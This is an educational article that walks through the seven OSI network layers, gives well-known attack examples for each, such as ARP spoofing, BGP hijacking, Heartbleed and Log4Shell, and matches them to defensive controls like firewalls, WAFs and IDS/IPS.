The OSI model is the conceptual backbone that breaks down the complexity of network communication into seven distinct layers. While real-world environments often rely on the TCP/IP model, OSI remains essential for understanding, classifying, and defending systems against cyberattacks.
Each layer represents a specific set of functions but also exposes particular attack vectors and requires dedicated defensive measures. Understanding how each level relates to real-world threats allows for more precise security controls, reduced attack surface, and faster, more effective incident response.
Layer 1 – Physical
This is the lowest layer, responsible for transmitting binary data over the physical medium, electrical signals, light pulses, or radio waves. It defines aspects like cabling, connectors, topology, and signal modulation.
An attacker disrupting a Wi-Fi network with a jamming device operates at this layer. Similarly, physical tapping into an Ethernet cable to intercept data without detection is a layer 1 attack. In critical infrastructures, fiber optic links have been sabotaged or manipulated to degrade or cut communication, a known industrial sabotage tactic.
Layer 2 – Data Link
This layer governs access to the physical medium using MAC addresses, frames, and error control mechanisms. In local networks, it enforces how devices take turns to transmit.
A classic example is ARP spoofing, where an attacker sends fake ARP responses to associate their MAC address with the gateway’s IP, redirecting all traffic through themselves (MITM). MAC flooding is another example, overloading a switch’s CAM table with bogus MACs, forcing it to broadcast traffic like a hub. These techniques have been used in internal pentests to expose poor LAN segmentation.
Layer 3 – Network
Responsible for routing packets between different networks using IP addresses and protocols like ICMP, IPsec, and BGP.
In 2008, Pakistan Telecom (PTCL) accidentally, or deliberately, announced a BGP route for YouTube, redirecting global traffic into its network. This BGP hijacking incident took YouTube offline globally. Smurf attacks are another example, where ICMP echo requests are sent to an entire subnet with a spoofed source IP, flooding the target with replies.
Layer 4 – Transport
Manages reliable end-to-end communications between processes. TCP provides ordered, reliable delivery; UDP offers fast, connectionless transmission.
SYN flood attacks send a barrage of half-open TCP handshakes, exhausting server resources. TCP reset attacks can inject RST packets to cut active connections. UDP flooding can disrupt services like VoIP or SCADA systems if rate-limiting is not in place.
Layer 5 – Session
Establishes, maintains, and terminates sessions between applications. Though often intertwined with layer 4 in real implementations, it remains key for long-lived, stateful connections like SSH or SIP.
Session hijacking involves stealing a valid session token (e.g., from an unprotected cookie) and reusing it to impersonate a legitimate user. These attacks were common before HTTPS and HttpOnly flags became standard.
Layer 6 – Presentation
Handles data translation into a common format: encoding (ASCII, UTF-8), compression, and especially encryption.
Attacks like POODLE (Padding Oracle On Downgraded Legacy Encryption) forced a downgrade from TLS to SSLv3, allowing attackers to decrypt protected traffic. Heartbleed exploited a bounds-checking bug in OpenSSL, leaking memory contents including certificates, private keys, and credentials, a serious vulnerability in layer 6.
Layer 7 – Application
Closest to the user, this layer includes high-level protocols like HTTP, SMTP, DNS, FTP, and any exposed API or service.
The Log4Shell vulnerability (CVE-2021-44228) allowed remote code execution via crafted strings passed through HTTP headers, exploiting unsafe logging in Java applications. This kind of flaw stems from trusting user input without sanitization. Other common attacks include SQL injection, cross-site scripting (XSS), file upload abuse, and DNS misconfigurations.
Structured Examples: Attacks and Defenses by Layer
Traditional firewalls, such as iptables, Fortinet, or Cisco ASA, primarily operate at layers 3 (IP) and 4 (TCP/UDP). They filter traffic by source, destination, and port, preventing unauthorized access, blocking scans, or restricting inter-subnet communications.
A WAF (Web Application Firewall) works at layer 7, inspecting HTTP requests, headers, parameters, and payloads. It detects and blocks XSS, SQL injection, malicious uploads, and abuse of vulnerable endpoints.
IDS/IPS systems (e.g., Suricata, Snort) can inspect traffic across multiple layers:
- Detecting scans (layer 3 and 4),
- Recognizing ARP poisoning (layer 2),
- Identifying TLS downgrade attempts (layer 6),
- Blocking web exploits in HTTP traffic (layer 7).
TLS interception proxies inspect and re-encrypt HTTPS traffic, operating at layers 6 and 7, useful in enterprise security, though controversial in terms of privacy and compliance.
Network Access Control (NAC) systems like Cisco ISE operate at layer 2, managing device access using MAC addresses, posture assessment, or 802.1X authentication.
VPN technologies (IPsec, OpenVPN, WireGuard) encapsulate traffic from layer 3 upward, providing confidentiality, authentication, and integrity, especially important over untrusted networks.
Understanding the OSI model is not academic nostalgia, it’s a practical necessity. In hybrid environments, cloud ecosystems, and segmented networks, applying controls per layer is key to implementing effective defense-in-depth strategies. Lower layers require physical protection and segmentation, mid-layers need route filtering and protocol inspection, and upper layers demand rigorous input validation, strong authentication, and secure-by-design application architecture.
The OSI model remains the most effective mental framework for mapping how data flows, and where it breaks. It’s only by knowing how the system is structured that we can anticipate how it may be compromised.